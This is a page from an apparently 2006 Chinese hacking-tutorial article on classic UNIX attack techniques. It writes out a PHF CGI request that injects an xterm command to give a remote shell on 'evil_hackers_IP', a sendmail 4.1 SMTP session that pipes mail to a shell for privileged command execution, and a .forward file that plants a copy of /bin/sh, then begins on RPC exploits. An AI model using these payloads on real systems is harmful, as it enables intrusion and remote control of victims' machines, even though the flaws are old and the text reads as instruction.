开发学院网络安全黑客技术 战术攻防思维撷粹(2) 阅读

战术攻防思维撷粹(2)

 2006-07-04 20:29:23 来源:WEB开发网   
核心提示: 当然,我们还可以结合xterm终端工具和X服务器原理,战术攻防思维撷粹(2)(8),而制造如下请求:/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil_hackers_IP:0.0,这个请求将会在攻击者的

当然,我们还可以结合xterm终端工具和X服务器原理,而制造如下请求:

/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil_hackers_IP:0.0,这个请求将会在攻击者的显示屏幕上弹出一个xterm,提供了受害者的shell命令界面给予操作。

**邮件的几个问题

曾经流行一时的sendmail 4.1漏洞就在于通过管道方式,攻击者可以直接以特权方式执行命令(命令行顺序输入如下指令):

Telnet smtpwww.victim.com 25
helo
mail from: |
rcpt to: bounce
data
.
mail from: bin
rcpt to: | sed '1,/^$/d' | sh
data

然而这个漏洞如今几乎无处可以查询。而另一个精致的渗透方式则利用了邮件转发功能,用户主目录下的.forward把指定邮件转移到另一帐号或邮件到达时候运行某个程序,下面实验需要对受害者的主目录具有写权限:

[Labmachine]$ cat > .forward

| "cp /bin/sh /home/test/sh ; chmod 755 /home/test/sh"

[Ctrl+D]

#上载此文件到用户的主目录下,并执行下面程序

[Labmachine]$ echo hello chump | mail test@targetsystem.com

执行后生成受害用户的一个shell,不过由于上载.forward需要对用户目录有写权限,因此这种方法似乎有些绕圈子的味道。

当然,关于sendmail的众多漏洞是数以百计的,这是由于sendmail的结构体系过于庞大,功能过于复杂多变而引起的。采用安全性更高的qmail似乎能解决sendmail的安全性问题。

**RPC挖掘

RPC的好处凡是使用过UNIX的人都知道,这是一种允许在一台计算机上运行的某个程序无缝地在另一个远程系统上执行代码的机制。而且由于许多厂家的支持,多数主流的Unix服务器仍采用了RPC标准。但由于RPC设计时候,很少考虑安全特性,因此由此引入的隐患也明灭可睹。基于CDE桌面系统的rpc.ttdbserverd和rpc.cmsd漏洞溢出;与NFS有关的rpc.statd和rpc.mountd的利用都是经典的例子(这类文章可以在google中搜索得到),下面的例子采用了CERT的ca-99-08-cmsd的文章:

上一页  3 4 5 6 7 8 9 10  下一页

Tags:战术 攻防 思维

编辑录入:爽爽 [复制链接] [打 印]
[]
  • 好
  • 好的评价 如果觉得好,就请您
      0%(0)
  • 差
  • 差的评价 如果觉得差,就请您
      0%(0)
赞助商链接